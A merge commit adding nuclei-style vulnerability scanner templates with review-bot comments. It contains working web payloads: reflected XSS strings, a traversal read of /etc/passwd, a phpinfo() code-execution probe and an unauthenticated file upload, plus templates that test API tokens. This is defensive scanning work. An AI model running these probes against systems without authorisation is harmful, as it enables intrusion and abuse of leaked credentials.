Merge branch 'master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-05-19 16:47:32 -04:00 committed by GitHub
commit e83f9df9f2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 356 additions and 6 deletions


@ -0,0 +1,9 @@
cves/2013/CVE-2013-6281.yaml
cves/2018/CVE-2018-18608.yaml
cves/2019/CVE-2019-18371.yaml
cves/2021/CVE-2021-45428.yaml
cves/2022/CVE-2022-0346.yaml
exposures/files/xampp-environment-variables.yaml
token-spray/api-debounce.yaml
token-spray/api-tatum.yaml
vulnerabilities/dedecms/dedecms-config-xss.yaml


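--- /dev/null
+++ b/cves/2013/CVE-2013-6281.yaml
@@ -0,0 +1,46 @@
+id: CVE-2013-6281
+info:
+name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
+author: random-robbie
+severity: medium
+description: |
+The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
+reference:
+- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+- https://www.securityfocus.com/bid/63256/
+- https://wordpress.org/plugins/dhtmlxspreadsheet/
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2013-6281
+cwe-id: CWE-79
+metadata:
+google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
+verified: "true"
+tags: cve,cve2013,wordpress,xss,wp-plugin,wp
+requests:
+- raw:
+- |
+GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+Host: {{Hostname}}
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "page: '<script>alert(document.domain)</script>'"
+- "dhx_rel_path"
+condition: and
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200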
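Review bot: `verified: "true"` in the metadata block is a quoted string, while the other templates added in this commit (CVE-2022-0346, dedecms-config-xss) write the bare boolean `verified: true`; nuclei treats metadata as free-form text as far as I know, so this is a consistency point rather than a functional one, but the repo should settle on one spelling. The `https://www.securityfocus.com/bid/63256/` reference is, to my knowledge, no longer served since that site was retired; the wpscan and cve.mitre entries already cover the advisory, so it could be dropped. Pairing the reflected `page: '<script>…'` string with `dhx_rel_path` is a good matcher choice, since it ties the reflection to the plugin's own script rather than to any page that echoes its query string.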


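--- /dev/null
+++ b/cves/2018/CVE-2018-18608.yaml
@@ -0,0 +1,44 @@
+id: CVE-2018-18608
+info:
+name: DedeCMS V5.7 - Cross Site Scripting
+author: ritikchaddha
+severity: medium
+description: |
+DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
+reference:
+- https://github.com/ky-j/dedecms/issues/8
+- https://nvd.nist.gov/vuln/detail/CVE-2018-18608
+- https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
+classification:
+cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2018-18608
+cwe-id: CWE-79
+metadata:
+shodan-query: http.html:"DedeCms"
+verified: "true"
+tags: dedecms,xss,cve,cve2018
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "'><script>alert(document.domain)</script>"
+- "DedeCMS Error Warning!"
+condition: and
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200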


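--- /dev/null
+++ b/cves/2019/CVE-2019-18371.yaml
@@ -0,0 +1,33 @@
+id: CVE-2019-18371
+info:
+name: Xiaomi routers - Local file inclusion
+author: ritikchaddha
+severity: high
+description: |
+An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
+reference:
+- https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
+- https://nvd.nist.gov/vuln/detail/CVE-2019-18371
+- https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+cvss-score: 7.5
+cve-id: CVE-2019-18371
+cwe-id: CWE-22
+tags: xiaomi,cve2019,cve,lfi,router,mi
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"
+matchers-condition: and
+matchers:
+- type: regex
+regex:
+- "root:.*:0:0:"
+- type: status
+status:
+- 200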
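Review bot: The regex matcher omits `part: body`; nuclei defaults to the body, but every other matcher in the templates added by this commit names its part explicitly, so `part: body` on that matcher would keep the files consistent and make the intent obvious to a reader. The file also carries no `metadata` block (no `verified` flag, no search query) unlike the sibling CVE templates here, so it is unclear whether the probe was exercised against a device. The request reads `/etc/passwd` rather than the `/etc/config/account` file the description names, which is the right choice for a non-intrusive check; a comment such as `# reads /etc/passwd only; /etc/config/account (credentials) is the file named in the advisory` would stop a later editor from "fixing" it back to the credential file.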


@ -8,6 +8,7 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
- https://ssd-disclosure.com/?p=4688
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
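Review bot: The MITRE reference on the context line `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561` is missing the `CVE-` prefix, so the lookup does not resolve to an advisory; it should read `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561`. The hunk itself only adds a second ssd-disclosure.com link, which appears to be the same advisory as the one two lines above it under a numeric permalink; keeping one of the two would be enough. The info block continues outside the hunk.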


@ -5,12 +5,12 @@ info:
author: hackergautam
severity: critical
description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
reference:
- https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
remediation: This issue is resolved in Apache Solr 8.8.2 and later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8


@ -9,6 +9,7 @@ info:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/rs/node-netmask
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1


@ -9,6 +9,7 @@ info:
reference:
- https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-30461
- https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
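Review bot: The ssd-disclosure.com reference added here differs from the one two lines above it only in its slug (`ssd-advisory--voipmonitor-unauth-rce` with a double hyphen and no trailing slash, versus `ssd-advisory-voipmonitor-unauth-rce/`), so in all likelihood both point at the same advisory; keep whichever URL currently resolves and drop the other rather than carrying a near-duplicate. Which of the two is the new line is not recoverable from the rendered hunk. The info block continues outside the hunk.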


@ -9,6 +9,7 @@ info:
- https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
- https://nvd.nist.gov/vuln/detail/CVE-2021-3129
- https://github.com/facade/ignition/pull/334
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8


@ -11,12 +11,12 @@ info:
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
- https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
- https://nvd.nist.gov/vuln/detail/CVE-2021-44515
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-44515
cwe-id: CWE-287
remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
tags: cve,cve2021,cisa,zoho,rce,manageengine
requests:


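--- /dev/null
+++ b/cves/2021/CVE-2021-45428.yaml
@@ -0,0 +1,48 @@
+id: CVE-2021-45428
+info:
+name: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
+author: gy741
+severity: critical
+description: |
+TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
+reference:
+- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
+- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
+- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 9.8
+cve-id: CVE-2021-45428
+cwe-id: CWE-639
+metadata:
+shodan-query: http.html:"TLR-2005KSH"
+verified: "true"
+tags: cve,cve2021,telesquare,intrusive,fileupload
+requests:
+- raw:
+- |
+GET /{{randstr}}.txt HTTP/1.1
+Host: {{Hostname}}
+- |
+PUT /{{randstr}}.txt HTTP/1.1
+Host: {{Hostname}}
+CVE-2021-45428
+- |
+GET /{{randstr}}.txt HTTP/1.1
+Host: {{Hostname}}
+req-condition: true
+matchers-condition: and
+matchers:
+- type: dsl
+dsl:
+- 'status_code_1 == 404 && status_code_2 == 201'
+- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
+condition: and
+# Enhanced by mp on 2022/05/19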
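Review bot: The template uploads `{{randstr}}.txt` to the device's web root and never removes it, so every scan of a vulnerable TLR-2005KSH leaves an attacker-writable marker file behind; the `intrusive` tag flags this, but a fourth raw request `DELETE /{{randstr}}.txt HTTP/1.1` after the verification GET would clean up on devices whose handler also honours DELETE (that it does is an assumption to confirm against the advisory), with the DSL left referencing only `status_code_1..3` so a failed cleanup cannot mask a positive. The `status_code_1 == 404` pre-check before the PUT is good, since it rules out matching a file that already existed. `cwe-id: CWE-639` (authorization bypass through user-controlled key) does not describe an unauthenticated arbitrary upload; CWE-434 is the closer fit unless the NVD assignment is being mirrored deliberately, which is worth checking. `THe` in the description is a typo in a runtime string and should become `The`.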


@ -10,12 +10,14 @@ info:
- https://www.exploit-db.com/exploits/50936
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-46422
cwe-id: CWE-78
metadata:
shodan-query: html:"SDT-CW3B1"
verified: "false"
tags: cve,cve2021,injection,rce
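Review bot: The two `drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T` references point at the same folder id, one with a dangling `?` and one with `?usp=sharing`; only one should remain, and since the rendered hunk does not show which is the added line, whichever survives should be the `?usp=sharing` form that actually opens the share. `verified: "false"` in the new metadata is a quoted string where the other templates in this commit mix `"true"` and bare `true`; a single spelling across the repo would help tooling that filters on it. The info block continues outside the hunk.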


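--- /dev/null
+++ b/cves/2022/CVE-2022-0346.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-0346
+info:
+name: Google XML Sitemap Generator < 2.0.4 - Reflected Cross-Site Scripting & RCE
+author: Akincibor
+severity: high
+description: |
+The plugin does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
+reference:
+- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
+- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0346
+metadata:
+verified: true
+tags: xss,wp,wordpress,wp-plugin,cve,cve2022
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
+- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
+req-condition: true
+matchers-condition: and
+matchers:
+- type: dsl
+dsl:
+- "contains(body_1, 'PHP Extension') || contains(body_1, 'PHP Version')"
+- "contains(body_2, '<img src onerror=alert(document.domain)>') || contains(body_2, 'Invalid Renderer type specified')"
+condition: or
+- type: word
+part: header
+words:
+- text/html
+extractors:
+- type: regex
+part: body
+group: 1
+regex:
+- '>PHP Version <\/td><td class="v">([0-9.]+)'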
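Review bot: The second DSL expression is satisfied by `contains(body_2, 'Invalid Renderer type specified')` on its own, so a site that returns the plugin's error message without reflecting the payload — a patched 2.0.4 install, if that message is unchanged there — still matches, and the `condition: or` on the DSL list lets that single expression mark the target vulnerable; tie the match to the reflection, `"contains(body_2, '<img src onerror=alert(document.domain)>')"`, and use the error string only as corroboration with `&&`. The MITRE reference has the wrong year, `cvename.cgi?name=CVE-2002-0346`, and should be `CVE-2022-0346`. The file also lacks the `classification` block (`cve-id`, `cwe-id`, CVSS) that the other CVE templates in this commit carry. The first request executes `phpinfo()` on the target whenever `allow_url_include` is on; that is code execution on the host and arguably warrants the `intrusive` tag, or at minimum a comment on that path line saying so.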


@ -1,4 +1,4 @@
id: CVE-2022-1598
id: CVE-2022-1597
info:
name: WPQA < 5.4 - Reflected Cross-Site Scripting
@ -12,7 +12,7 @@ info:
- https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
classification:
cve-id: CVE-2022-1598
cve-id: CVE-2022-1597
metadata:
verified: true
google-dork: inurl:/wp-content/plugins/wpqa


@ -3,7 +3,7 @@ id: CVE-2022-30489
info:
name: Wavlink Wn535g3 - POST XSS
author: For3stCo1d
severity: high
severity: medium
description: |
WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.
reference:


@ -9,13 +9,14 @@ info:
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
classification:
cve-id: CVE-2022-30525
metadata:
shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
tags: rce,zyxel,cve,cve2022,firewall,unauth
requests:


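--- /dev/null
+++ b/exposures/files/xampp-environment-variables.yaml
@@ -0,0 +1,30 @@
+id: xampp-environment-variables
+info:
+name: XAMPP Environment Variables Exposure
+author: melbadry9,DhiyaneshDK
+severity: low
+tags: exposure,xampp
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/cgi-bin/printenv.pl"
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "<TITLE>Environment Variables</TITLE>"
+- "Environment Variables:"
+condition: and
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 200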
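Review bot: Nothing in the request or the matchers is specific to XAMPP: `/cgi-bin/printenv.pl` is, as far as I know, the sample CGI script that ships with Apache httpd itself, and the matched `<TITLE>Environment Variables</TITLE>` text is what that script prints, so the `xampp` id, name and tag under-describe what the template will find; either widen the tags to something like `exposure,xampp,apache,cgi` or add a `description:` line stating that any Apache install with the sample CGIs enabled will match. The `info` block has no `description` or `reference` at all, unlike every other template in this commit; the Apache httpd CGI documentation would be the natural reference. `severity: low` is defensible for the stock script, but the dumped environment can include `SetEnv` values, proxy settings and filesystem paths, so the description should tell the reader to inspect the output rather than just count the hit.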


@ -12,6 +12,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/haproxy-status"
- "{{BaseURL}}/haproxy?stats"
matchers-condition: and
matchers:


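--- /dev/null
+++ b/token-spray/api-debounce.yaml
@@ -0,0 +1,25 @@
+id: api-debounce
+info:
+name: DeBounce API Test
+author: 0ri2N
+severity: info
+reference:
+- https://developers.debounce.io/reference/api-key-authentication
+- https://debounce.io
+tags: debounce,token-spray
+self-contained: true
+requests:
+- method: GET
+path:
+- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
+matchers:
+- type: word
+part: body
+words:
+- '"balance":'
+- '"success":'
+- '"debounce":'
+condition: and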


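--- /dev/null
+++ b/token-spray/api-tatum.yaml
@@ -0,0 +1,28 @@
+id: api-tatum
+info:
+name: Tatum API Test
+author: 0ri2N
+severity: info
+reference:
+- https://apidoc.tatum.io/#tag/Node-RPC
+- https://docs.tatum.io
+tags: defi,dapp,token-spray,blockchain
+self-contained: true
+requests:
+- method: POST
+path:
+- "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}"
+headers:
+Content-Type: application/json
+body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}"
+matchers:
+- type: word
+part: body
+words:
+- '"id":'
+- '"result":'
+- '"jsonrpc":'
+condition: and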


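--- /dev/null
+++ b/vulnerabilities/dedecms/dedecms-config-xss.yaml
@@ -0,0 +1,37 @@
+id: dedecms-config-xss
+info:
+name: DedeCMS V5.7 config.php XSS
+author: ritikchaddha
+severity: medium
+description: |
+DeDeCMS v5.7 has an XSS vulnerability in the '/include/dialog/config.php' file, and attackers can use this vulnerability to steal user cookies, hang horses, etc.
+reference:
+- https://www.zilyun.com/8665.html
+- https://www.60ru.com/161.html
+- https://www.cnblogs.com/milantgh/p/3615853.html
+metadata:
+verified: true
+shodan-query: http.html:"DedeCms"
+tags: dedecms,xss
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "location='../../</script><script>alert(document.domain)</script>"
+- type: word
+part: header
+words:
+- text/html
+- type: status
+status:
+- 200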
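Review bot: The description's `hang horses` is a word-for-word rendering of the Chinese 挂马, which in security writing means planting a malicious script or drive-by download on the page, and it will read as nonsense to most users of the repo; `description: DedeCMS v5.7 reflects the adminDirHand parameter of /include/dialog/config.php into an inline script, letting an attacker steal cookies or plant malicious scripts.` says the same thing in English and also names the parameter the request actually abuses. All three references are Chinese blog posts; if a CVE or vendor bulletin exists for this issue it should be added, but I have not confirmed that one does, so no `classification` block is being proposed. The matcher on `location='../../</script><script>…` is well chosen, since it requires the `</script>` breakout to land inside the `location=` assignment rather than merely anywhere in the body.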